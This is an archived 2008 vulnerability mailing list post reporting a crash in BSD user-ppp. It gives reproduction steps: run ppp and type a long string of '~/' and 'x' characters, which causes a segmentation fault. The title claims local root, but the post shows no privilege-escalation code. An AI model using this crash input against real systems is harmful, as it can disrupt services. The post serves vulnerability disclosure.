Vulnerability Development mailing list archives
*BSD user-ppp local root (when conditions permit)
From: sipherr () gmail com
Date: 29 Feb 2008 16:39:03 -0000
/***********************************************************************************/ /*** pppx.conf - Point to Point Protocol (a.k.a. user-ppp) exploit by sipher ***/ /*** 2003 / 12 /23 - PRIVATE CODE ***/ /*** Program terminated with signal 11, Segmentation fault. ***/ /*** #0 0xbeefdead in ?? () ***/ /***********************************************************************************/ I just tested this on FreeBSD 6.3. This bug was discovered on NetBSD. It also works on OpenBSD (unconfirmed on 4.2) Steps to reproduce: 1. Run ppp 2. type the following (or atleat some variation of) ~/~/~/~/~/~/~/~/~/~/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx This will produce a segmentation violation (Core dumped). Discovered by: sipher Shouts: princess^pookie,spithash,burnout,#codemasters,#hackers@dalnet
Current thread:
- *BSD user-ppp local root (when conditions permit) sipherr (Feb 29)